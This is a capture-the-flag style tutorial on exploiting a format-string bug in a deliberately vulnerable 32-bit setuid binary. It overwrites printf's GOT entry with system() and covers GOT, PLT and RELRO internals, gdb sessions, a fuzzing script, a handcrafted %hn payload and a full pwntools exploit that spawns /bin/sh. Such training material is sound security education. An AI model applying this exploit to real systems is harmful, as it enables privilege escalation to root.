description |
---|
09/19/2023 |
We're really deep now. Here, we will be focusing on overwriting the Global Offset Table (GOT)! We are going to be using another format string vulnerability, but there will be no buffer overflow this time.
The Global Offset Table (GOT) is a section of a computer program's memory that is used to enable computer program code that has been compiled as an ELF file to be ran correctly. Simply put, it is a section inside of the program (ELF) that holds addresses of functions that are dynamically linked.
This is all independent of the memory address where the program's code or data is loaded at during runtime.
The GOT is responsible for mapping symbols (human-readable identifiers when compiled) to their correct addresses to facilitate Position Independent Code (PIC) and Position Independent Executables (PIE).
So, where is the GOT located in memory?
You can find the GOT being represented as the .got
and .got.plt
sections within the ELF file which are loaded into the program's memory at the start of execution.
The Operating System's dynamic linker updates the GOT's relocations at program startup or when symbols are being accessed.
Dynamic Resolving
This allows the function to be able to be located from a dynamic library with much more efficacy. The result is saved into the GOT so future function calls jump straight to their implementation bypassing the dynamic resolver.
Implications:
- The GOT contains pointers to libraries which are constantly moved around due to Address Space Layout Randomization (ASLR)
- The GOT is also writeable
What is the Procedure Linkage Table (PLT)?
Before a function's address has been resolved, the GOT will point to an entry in the PLT. This is a function on its own that is responsible for calling the dynamic linker with the name of the function that is to be resolved.
Something else to note:
If the binary that we are targeting is compiled with FULL RELRO, we will NOT be able to use this specific technique on the target. However, if it is compiled with PARTIAL RELRO, we will be able to!
What is RELRO?
Relocation Read-Only (RELRO) is a protection to stop any GOT overwrites from taking place.
Partial RELRO:
This will only move the GOT above the program's variables. However, this does not prevent format string overwrites.
Full RELRO:
This makes the GOT completely read-only, even format string vulnerabilities will not be able to overwrite anything. This is not default in binaries because of slow processing times since it will need to resolve all function addresses simultaneously.
{% embed url="https://github.com/Crypto-Cat/CTF/tree/main/pwn/binary_exploitation_101/09-overwriting_got" %}
{% embed url="https://www.youtube.com/watch?v=KgDeMJNK5BU" %} CryptoCat {% endembed %}
{% embed url="https://systemoverlord.com/2017/03/19/got-and-plt-for-pwning.html" %}
sudo chown root:root got_overwrite
sudo chmod 4655 got_overwrite
sudo chown root:root flag.txt
sudo chmod 600 flag.txt
file
:
{% code overflow="wrap" %}
file got_overwrite
got_overwrite: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, BuildID[sha1]=57da01c938d00b9c9beb3a58299d8c64766d748c, for GNU/Linux 3.2.0, not stripped
{% endcode %}
- 32-bit Binary
- Dynamically linked to
libc
- Not stripped
checksec
:
RELRO STACK CANARY NX PIE RPATH RUNPATH Symbols FORTIFY Fortified Fortifiable FILE
Partial RELRO Canary found NX enabled No PIE No RPATH No RUNPATH 71 Symbols No 0 2 got_overwrite
- Partial RELRO
- This is pertaining to the vulnerability that we will be targeting
- Maps the
.got
section as read-only (but not.got.pl
t)
- Stack Canary is ENABLED -- Each buffer in the program will contain a stack canary value and the return address
- Before the jump to the return address, the canary value is checked to ensure that it is the same original value, helping to mitigate against buffer overflow attacks
- If the value is not the same, a stack smashing error will be issued; crashing the program
- NX is ENABLED -- So we do not have an executable stack
We can see that our input is being directly reflected back at us presumably with printf()
or something similar.
There must be a while(true)
loop going on because the program will infinitely await user-input and not exit.
Unable to segfault from overflow
There seems to be some kind of buffer/sizeof()
checking going on since we cannot overflow the buffer.
Keep in mind that I renamed variables, added comments, etc.
main()
:
/* WARNING: Function: __x86.get_pc_thunk.bx replaced with injection: get_pc_thunk_bx */
undefined4 main(void)
{
int iVar1;
undefined4 uVar2;
int in_GS_OFFSET;
iVar1 = *(int *)(in_GS_OFFSET + 20);
setuid(0);
setgid(0);
/* Vulnerable Functions -- Format String Bug */
vuln();
uVar2 = 0;
if (iVar1 != *(int *)(in_GS_OFFSET + 0x14)) {
/* Stack Canary -- __stakc_chk_fail_local indicates usage of canaries */
uVar2 = __stack_chk_fail_local();
}
return uVar2;
}
setuid(0)
andsetgid(0)
are ensuring that our binary runs smoothly with root permissions- We call
vuln()
and upon further analysis (which you will see below, we were able to identify a format string vulnerability) - __stack_chk_fail_local() indicates usage of stack canary-protected binary
vuln()
:
/* WARNING: Function: __x86.get_pc_thunk.bx replaced with injection: get_pc_thunk_bx */
/* WARNING: Globals starting with '_' overlap smaller symbols at the same address */
void vuln(void)
{
int in_GS_OFFSET;
char buffer [300];
undefined4 local_10;
local_10 = *(undefined4 *)(in_GS_OFFSET + 0x14);
do {
/* fgets() is checking that the buffer is sizeof() the specified buffer.
Preventing buffer overflow. Also keep in mind canaries are enabled. */
fgets(buffer,300,_stdin);
/* No format string was specified -- printf() format string bug identified */
printf(buffer);
} while( true );
}
- Instantiate a char-based buffer with size of 300-bytes
- fgets() is using sizeof() our buffer (300-bytes) and ensuring up to 300-bytes are being stored and nothing more
printf(buffer)
is a string format vulnerability because it is not specifying a format specifier as an argumentwhile( true )
allows the program to be infinitely looped
Notice how we have a string format bug (Remember, this is because our printf()
does not utilize a format specifier.) we can input a value that will overwrite an element of the GOT, we can find the address of printf()
in the GOT and overwrite it with the address of system()
.
Since we are constrained to an infinite loop, what will happen is:
- We will loop around again
- Take an input from us
- Then, instead of calling
printf()
with the buffer, it will call system() with the buffer - If our buffer is
"/bin/sh"
, this will call"/bin/sh"
.got
:
This is the Global Offset Table (GOT). This is where the actual table of offsets are located as filled in by the linker for external symbols.
.plt
:
This is the Procedure Linkage Table (PLT). These are stubs that look up the addresses in the .got.plt
section and either jump to the right address or trigger the code in the linker to look up the address.
.got.plt
:
This is the GOT for the PLT. It contains the target addresses after they have been looked up or an address back in the .plt
to trigger the lookup.
.plt.got
:
This contains code to jump to the first entry of the .got
.
The PLT and the GOT work together to perform linking.
For example, when you call printf()
in C and compile it as an ELF binary, it is not only printf()
. Rather, it is compiled as printf@plt
. Which you can see in GDB:
The GOT is a massive table of addresses and these are the actual locations in memory of the libc
functions.
When the PLT gets called it will read the GOT address and redirect execution from there.
When the address is empty, it will coordinate with the ld.so
(A.K.A. the dynamic linker/loader shared object) to get the function address and store it in the GOT.
Calling the PLT address of a function is the same as simply calling the function itself.
The GOT address contains addresses of functions in libc
and the GOT is within the binary.
After viewing the disassembly for a particular function, I was able to locate fgets()
, set a breakpoint, and view the inside of the PLT inside of gdb
. After stepping into it, we can see a jump instruction which is acting as a function pointer. This works as a dereference and will jump to the resulting address.
Remember, if ASLR is enabled on your machine, you will get different addresses each time you run the binary.
info functions
0x08049040 fgets@plt
b *0x08049040
r
We can see that since we set a breakpoint at our fgets@plt
function, that is where our instruction pointer or EIP
value will be left at until we continue execution.
We can use the following command to explicitly view the instruction that places us in the PLT
:
x/i $pc
or
x/i $eip
=> 0x8049040 <fgets@plt>: jmp DWORD PTR ds:0x804c010
We then see a jmp
instruction to a specific address.
However, this is not an ordinary jmp
instruction, this is what it looks like when a function pointer is being used.
NOTE: This pointer is in the .got.plt section of the binary.
We can then view the dereference:
x/wx 0x804c010
0x804c010 <fgets@got.plt>: 0x08049046
follow the jmp
:
x/2i $pc
=> 0x8049046 <fgets@plt+6>: push 0x8
0x804904b <fgets@plt+11>: jmp 0x8049020
We can see that we immediately jumped to the next instruction. This is because we have not called puts()
before and we need to trigger the lookup first.
It will push the number 0x8
onto the stack and then call the routine to lookup the symbol name.
This all happens in the beginning of the .plt
section.
Let's find out what this stub does:
x/2i $pc
=> 0x8049020: push DWORD PTR ds:0x804c004
0x8049026: jmp DWORD PTR ds:0x804c008
We push the value of the second entry into .got.plt
and then jump to the address stored in the third entry.
x/2x 0x804c004
0x804c004: 0xf7f4aa40 0xf7f25fe0
We can obtain our PID from our currently debugged binary running info inferiors
inside of pwndbg
.
info inferiors
Num Description Connection Executable
* 1 process 12579 1 (native)
- PID is 12579
We can then read from /proc/pid/maps
for more information.
cat /proc/12579/maps
We can then see that the first entry points into the data segment of ld.so
and the 2nd into the executable region.
In other words, we are asking for information for the puts()
symbol. These two addresses in the .got.plt
section are populated by the linker/loader (ls.so
) at the time it is loading the binary.
If we step through the instructions a few times using ni
, we will ultimately get to fgets()
.
info symbol $pc
fgets in section .text of /lib/i386-linux-gnu/libc.so.6
Let's print out our stack:
x/4wx $esp
We can actually get from main to fgets()
very quickly just by using the disassembly of puts@plt.
disass 'fgets@plt'
Dump of assembler code for function fgets@plt:
0x08049040 <+0>: jmp DWORD PTR ds:0x804c010
0x08049046 <+6>: push 0x8
0x0804904b <+11>: jmp 0x8049020
End of assembler dump.
x/wx 0x804c010
0x804c010 <fgets@got.plt>: 0xf7d3d690
info symbol 0xf7d3d690
fgets in section .text of /lib/i386-linux-gnu/libc.so.6
We can see a call to fgets@plt
will result immediately in a jmp
to the fgets()
address loaded via dynamic linking from libc
.
So, how did the .got.plt
get updated? This is why the pointer in the beginning of the GOT was passed as an argument back to ld.so
and ld.so
did black magic and inserted the proper address into GOT to replace the previous address which was pointed to the next instruction in the PLT.
Since our ultimate goal is to take control of the flow of execution of the program, we need to remember that the .got.plt
section is a giant array of function pointers.
So, could we overwrite one of these and control execution from there?
Any memory corruption primitive that will let you write to an arbitrary address will allow you to overwrite a GOT entry.
Ultimately, .got.plt
is very attractive for format string bugs and other arbitrary write exploits.
When your target binary lacks PIE, this will cause the .got.plt
to be loaded at a fixed address.
Enabling FULL RELRO will protect against these kinds of attack by preventing writing to the GOT, but will severely impact performance.
Printing values off of the stack with the format string bug:
%p %p %p
0x12c 0xf7f80620 0x80491b1
%s
Segmentation fault
Why did this happen?
We are able to print pointers from the stack by using %p
as the format specifier.
However, when we try to print a whatever address 0x12c
is pointing to as a string using %
s, it is going to result in a segmentation fault because the address 0x12c
is pointing to is NOT a valid location in memory (not in scope).
Read more about Format String Vulnerabilities here:
{% embed url="https://axcheron.github.io/exploit-101-format-strings/" %}
fuzz.py
:
from pwn import *
# This will automatically get context arch, bits, os etc
elf = context.binary = ELF('./got_overwrite', checksec=False)
# Create process (level used to reduce noise)
p = process(level='error')
# Let's fuzz x values
for i in range(100):
try:
# Format the counter
# e.g. %2$s will attempt to print [i]th pointer/string/hex/char/int
p.sendline('%{}$x'.format(i).encode())
# Receive the response
result = p.recvline().decode()
# If the item from the stack isn't empty, print it
if result:
print(str(i) + ': ' + str(result).strip())
except EOFError:
pass
This script will iterate 100 times and fuzz $x
, so printing out values on the stack in hex format.
We want to focus on the %n
format specifier.
When performing this kind of technique, we want to fuzz and print out values on the stack when injecting arbitrary data to see where our data/input ends up.
We can incrementally utilize position-based parameters with our input and print out or inject in a specific part of the stack.
See an example below:
Pay attention to the decrementing value immediately after the %
. We start with %6
and go to %4
in order to identify where our input ends up on the stack.
./got_overwrite
AAAA%6$p
AAAA0xf7fb000a
AAAA%5$p
AAAA0x70243525
AAAA%4$p
AAAA0x41414141
Okay cool, what is 41414141 converted to ASCII?
We can use the pwntools tool, unhex 41414141
to figure this out.
AAAA
!
Great, we have identified where our data is being injected onto the stack.
So we need to answer what place the input gets placed into so we can identify the address that can then be used for the %n
write operation.
We can use the following methodology to help us craft an exploit manually:
{% code overflow="wrap" %}
# Need to overwrite 0x0804c00c (GOT.printf) with 0xf7dff040 (LIBC.system)
# It means writing 0xf7df (63455) @ 0x0804c00c + 2 = 0x0804c00e (high order)
# and 0xf040 (61504) @ 0x0804c00c (low order)
# Now, we have to figure out the value to set for the padding. Here is the formula :
[The value we want] - [The bytes alredy wrote] = [The value to set].
# Let’s start with the low order bytes :
It’ll will be 61504 - 8 = 61496, because we already wrote 8 bytes (the two 4 bytes addresses).
# Then, the high order bytes :
It’ll will be 63455 - 61504 = 1951, because we already wrote 61504 bytes (the two 4 bytes addresses and 61496 bytes from the previous writing).
# Now we can construct the exploit (note our write offset is %4 so we want [%4,%5] as offsets instead of [%7,%8]) :
It’ll be : \x0c\xc0\x04\x08\x0e\xc0\x04\x08%61496x%4$hn%1951x%5$hn. Let me explain :
\x0c\xc0\x04\x08 or 0x0804c00c (in reverse order) points to the low order bytes.
\x0e\xc0\x04\x08 or 0x0804c00e (in reverse order) points to the high order bytes.
%61496x will write 61496 bytes on the standard output.
%4$hn will write 8 + 61496 = 61504 bytes (or 0xf040) at the first address specified (0x0804c00c).
%1951x will write 1951 bytes on the standard output.
%5$hn will write 8 + 61496 + 1951 = 63455 (or 0xf7df) at the second address specified (0x0804c00e).
python2 -c 'print("\x0c\xc0\x04\x08\x0e\xc0\x04\x08%61496x%4$hn%1951x%5$hn")' > payload
* Based on excellent blogpost: https://axcheron.github.io/exploit-101-format-strings/
{% endcode %}
Obtaining GOT.printf address:
Load the binary in Ghidra, open up the Program Tree, and inside of the got.plt
, you will see an EXTERNAL reference to printf()
, use that address, and you will have your GOT.printf
address.
Program Trees
Listing View // Obtaining GOT.printf
address
Obtain libc
base address:
ldd got_overwrite
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xf7d7f000)
exploit.py
:
from pwn import *
from pwnlib.fmtstr import FmtStr, fmtstr_split, fmtstr_payload
# Allows you to switch between local/GDB/remote from terminal
def start(argv=[], *a, **kw):
if args.GDB: # Set GDBscript below
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE: # ('server', 'port')
return remote(sys.argv[1], sys.argv[2], *a, **kw)
else: # Run locally
return process([exe] + argv, *a, **kw)
# Function to be called by FmtStr
def send_payload(payload):
io.sendline(payload)
return io.recvline()
# Specify your GDB script here for debugging
gdbscript = '''
init-pwndbg
continue
'''.format(**locals())
# Set up pwntools for the correct architecture
exe = './got_overwrite'
# This will automatically get context arch, bits, os etc
elf = context.binary = ELF(exe, checksec=False)
# Enable verbose logging so we can see exactly what is being sent (info/debug)
context.log_level = 'debug'
# ===========================================================
# EXPLOIT GOES HERE
# ===========================================================
io = start()
# Found manually (ASLR_OFF)
libc = elf.libc
libc.address = 0xf7d7f000 #0xf7e02150 #0xf7dba000 # ldd got_overwrite
# Find the offset for format string write
format_string = FmtStr(execute_fmt=send_payload)
info("format string offset: %d", format_string.offset)
# Print address to overwrite (printf) and what we want to write (system)
info("address to overwrite (elf.got.printf): %#x", elf.got.printf)
info("address to write (libc.functions.system): %#x", libc.symbols.system)
# Overwrite printf() in GOT with Lib-C system()
# Manual, like in notes.txt
# format_string.write(0x0804c00c, p16(0xf040)) # Lower-order
# format_string.write(0x0804c00e, p16(0xf7df)) # Higher-order
# Or automagically
format_string.write(elf.got.printf, libc.symbols.system)
# Execute the format string writes
format_string.execute_writes()
# Get our flag!
io.sendline(b'/bin/sh')
io.interactive()
Successful Exploitation